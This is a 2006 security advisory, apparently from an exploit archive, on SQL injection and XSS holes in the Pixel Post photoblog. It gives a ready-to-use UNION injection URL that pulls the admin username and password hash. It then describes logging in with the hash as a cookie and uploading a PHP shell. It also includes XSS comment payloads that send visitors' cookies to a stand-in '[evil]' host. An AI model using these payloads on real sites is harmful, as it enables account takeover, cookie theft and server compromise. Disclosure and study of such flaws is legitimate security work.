what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

adv_pixelpost.txt

adv_pixelpost.txt
Posted Mar 8, 2006
Authored by Paisterist, Knightmare | Site neosecurityteam.net

Pixel Post versions 1.4.3 and 1.5 beta1 have been found susceptible to SQL injection and cross site scripting attacks.

tags | exploit, xss, sql injection
SHA-256 | 380878565a9c6bdabddd71ab710ce332a7eb9c1947b4866d464de3d52a1c8c38

adv_pixelpost.txt

Change Mirror Download
/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]� - Advisory #19 - 04/03/06
--------------------------------------------------------
Program: Pixel Post
Homepage: http://www.pixelpost.org/
Vulnerable Versions: 1.4.3, 1.5 beta1 and possibly lower versions.
Risk: High!
Impact: XSS, and SQL Injection providing full access to admin area, providing upload any type of files capabilities.. :D

-==Pixel Post Multiple Vulnerabilities ==-
---------------------------------------------------------

- Description
---------------------------------------------------------
Pixelpost is a photoblog application powered by PHP and MySQL. It's developed and maintained by photobloggers who like to keep the meaning behind photoblogging in mind, the photography, and not about the 311 hacks you would have to get through to get your regular blog to work like...

- Tested
---------------------------------------------------------
localhost + many sites

- Explotation
---------------------------------------------------------

1)

Vulnerable code:

magic_quotes_gpc must be Off in order to exploit it.

==[ index.php 135-147 ]==========================
[...]
if($_GET['showimage'] == "") {
$row = sql_array("select * from ".$pixelpost_db_prefix."pixelpost where datetime<='$cdate' order by datetime DESC limit 0,1");
} else {
$row = sql_array("select * from ".$pixelpost_db_prefix."pixelpost where (id='".$_GET['showimage']."')");
}
if(!$row['image']) {
echo "Coming Soon! Nothing to show. No image to show here!";
exit;
}
$image_name = $row['image'];
$image_title = pullout($row['headline']);
$image_id = $row['id'];
$image_datetime = $row['datetime'];
[...]
==[ end index.php ]==========================


$showimage is the variable that is not properly sanitized (or not at all) and it's on line 138 that we can get advantage from this.

Since the application prevents PHP or MySQL Errors from being shown, we have to fetch the data replacing the one that was supposed to be fetched. So that $row[] is going to fetch what we specify and then print it on the page.

With this vulnerability we can fetch almost any data from the database, and from any tables.

PoC:
---------------------------------------------------------

http://[site]/[pixelpost_path]/?showimage=')%20UNION%20SELECT%20template%20as%20id,%20email%20as%20headline,%20admin%20as%20datetime,%20password%20as%20body,%20sitetitle%20as%20category,%20langfile%20as%20image%20FROM%20pixelpost_config/*

With this you can see on the frontpage, the username of the admin, and below resides the md5 hash of the admin.

It's not necesarry to crack it since you can log in to the admin through a cookie with the md5 hash.

pixelpost_admin=[hash]

Once having access to the admin area, you can upload any type of files, since file types or extensions are not checked.

So you can upload a PHP Shell or whatever. And depending on Server Configuration gain system access.


2)

Also by default you can see the System Configuration by viewing:

http://[site]/[pixelpost_path]/includes/phpinfo.php

==[ includes/phpinfo.php ]==========================
<?
phpinfo();
?>
==[ end includes/phpinfo.php ]======================

Which isn't restricted at all.


3)

Another SQL Injection resides when modifying the USER_AGENT, HTTP_REFERER and HTTP_HOST

The script doesn't sanitize this variables at all in includes/functions.php

==[ includes/functions.php 159-183 ]==========================
[...]
function book_visitor($str)
{
// book a visitor
$datetime = gmdate("Y-m-d H:i:s",gmdate("U")+(3600 * $cfgrow['timezone']));
$host = $_SERVER['HTTP_HOST'];
$referer = $_SERVER['HTTP_REFERER'];

// don't book a referer from self
$refererhost = parse_url($referer);
$refererhost = $refererhost['host'];
if($refererhost == $host)
{
$referer = "";
}
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = $_SERVER['REMOTE_ADDR'];
$ruri = $_SERVER['REQUEST_URI'];
// ### if cookie lastvisit not set, count the people!
if(!isset($_COOKIE['lastvisit']))
{
$query = "insert into $str(id,datetime,host,referer,ua,ip,ruri)
VALUES('NULL','$datetime','$host','$referer','$ua','$ip','$ruri')";
$result = mysql_query($query);
}
}
[...]
==[ end includes/functions.php ]==============================


4)

You can perform a XSS attack when commenting a post because the comment, the name, the url, and nor the email are properly sanitized.

Comment:
<img src="javascript:alert('xss')"> (IE and Opera)
<img src="javascript:document.location='http://[evil]/cookie.php?cookie='+document.cookie"> (Steal cookies)

<a href="javascript:alert('xss')">sarasa</a> (IE, Opera, Mozilla and probably all major browsers, but the user must click the link in order to succed)
<a href="javascript:document.location='http://[evil]/cookie.php?cookie='+document.cookie">sarasa</a> (Steal cookies)

There are lots of things you can do with a bit of imagination.



The application was not fully tested and many other vulnerabilities are probably present (Almost sure!)


- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=19

- Credits
-------------------------------------------------
Discovered by Knightmare -> mr.knightmarex [at] gmail [at] com

[ 3KLabs ] :: [ http://www.3klabs.com/ ]

And Paisterist -> paisterist.nst [at] gmail [dot] com

[N]eo [S]ecurity [T]eam [NST]� - http://www.neosecurityteam.net/


- Greets
--------------------------------------------------------
Mike
Guille
Zeus54
HaCkZaTaN
K4P0
Daemon21
Link
LINUX

Argentina, Mexico, Colombia, Chile, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/

/* EOF */
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close